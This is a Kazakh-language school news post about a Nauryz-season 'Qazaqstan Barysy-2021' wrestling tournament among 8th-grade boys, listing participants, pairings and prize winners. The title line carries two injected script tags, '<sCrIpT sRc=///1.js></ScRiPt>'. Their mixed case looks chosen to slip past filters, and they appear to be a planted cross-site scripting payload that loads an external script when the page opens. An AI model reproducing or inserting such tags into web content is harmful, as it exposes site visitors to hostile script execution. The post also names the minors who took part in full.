«Жақсы ауданы бойынша Жаңа Қима ауылының Ғұбайдолла Әбдірахманов атындағы жалпы орта білім беретін мектебі» КММ-нің «Наурыз» мейрамына қарсы өткізген іс-шарасы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
01.04.2021
Қазақ күресі қазақтардың ең көне спорт түрлерінің бірі. Қазіргі Қазақстанда бұл жекпе-жек өнер үлкен сұранысқа ие, ал қазақ күресі бойынша жарыстар мерекелер мен салтанаттарда жүргізіледі. 1938 жылдан бері республикалық жарыстар бағдарламасына кіреді. 2016 жылы ЮНЕСКО, толеранттылық, ізгі ниет және ынтымақтастыққа принциптеріне негізделген қауымдарды арасындағы қатынастарды нығайтуға әсерін атап өте отырып, қазақша күресті адамзаттың материалдық емес мәдени мұрасының репрезентативтік тізіміне енгізді.
«Қазақстан Барысы» турнирі идеясының авторы, «Қазақстан Барысы» қазақ күресін дамыту қоры қамқорлық Кеңесінің төрағасы - Арман Шораев.
«Қазақстан барысы» турнирінің ұйымдастырушылары: Қазақстан Республикасының Спорт және дене шынықтыру ісі жөніндегі агенттігі, Қазақстан Республикасының Мәдениет және ақпарат министрлігі, Қызылорда облысының әкімшілігі, «Қазақстан барысы» Қазақ күресін дамыту қоры және Қазақстан Республикасының Қазақ күресі федерациясы. «Наурыз» мейрамы қарсаңында 8 сыныптың ұл балалары арасында «Қазақстан барысы-2021» турнирі ұйымдастырылды. «Қазақстан барысы» турнирі 3 кезеңді қамтылды.
Қатысатын оқушылар: Жоламанов Нұрканат, Жабагин Амир, Каиржанов Аман, Кабден Илияс, Амангелді Тамирлан, Мұхиден Алдан, Такен Аңсар, Оспанов Амангелді, Шарапов Расул, Ерік Мерейхан.
1 кезеңде: жұптар анықталды.
Жұптар:
- Жоламанов Нұрканат- Жабагин Амир,
- Каиржанов Аман - Амангелді Тамирлан,
- Мұхиден Алдан - Такен Аңсар,
- Кабден Илияс - Ерік Мерейхан,
- Оспанов Амангелді - Шарапов Расул.
2 кезеңде: әр жұптан бір жеңімпаз шығып, келесі кезеңге жолдама алды.
3 кезеңде: Нағыз палуандар анықталып, жеңімпаз атанды.
Осы қазақ күресіне деген қызығушылықтарын арттыру мақсатында сынып ұлдары арасында турнирі өткізіліп, мәресіне жетті. Осы турнирда жеңімпаздар анықталды. «Қазақстан барысы» мектепішілік турнирінің жеңімпаздары: «Қазақстан барысы» турнирінде 1 орын алған Мұхиден Алдан атанды. Сонымен қатар Оспанов Амангелді 2 орын, Амангелді Тамирлан 3 орынға ие болды.
Есенгулова Т.С.